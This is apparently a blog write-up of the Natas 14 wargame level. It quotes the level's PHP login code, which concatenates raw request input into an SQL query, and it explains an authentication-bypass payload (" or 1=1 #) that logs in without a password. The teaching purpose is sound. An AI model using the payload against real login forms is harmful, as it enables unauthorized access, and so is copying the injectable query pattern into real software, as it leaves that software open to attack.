We are greeted with a login page where we have to fill in an username and password.

Solving it:
We probably have to do an SQL injection, but lets have a look at the source code

<div id="content">
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
} else {

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

If we look in the source code we can see that the query is as follows: SELECT * from users where username = [username] AND password = [password].

Lets fill in an double quote ” to see if we get any mysql error, yes we do.

This means that the login form is probably vulnerable for SQL injection. So lets write down the whole query and make a payload, then update the query to see how it looks and have another look at it if it will execute.

Query: SELECT * from users where username = "[username]" AND password = "[password]"
Payload: " or 1=1 #
New query: SELECT * from users where username = "" or 1=1 #" AND password = "[password]"

We have to add the double quote at the start of the payload to close the double qoute that opened in the query. Then we add an statement that is always true so it will log us in. As last we add an # so it ignores/comments the rest of the query. So lets try the payload: Payload: ” or 1=1 # and it worked!

Leave a Reply

Your email address will not be published. Required fields are marked *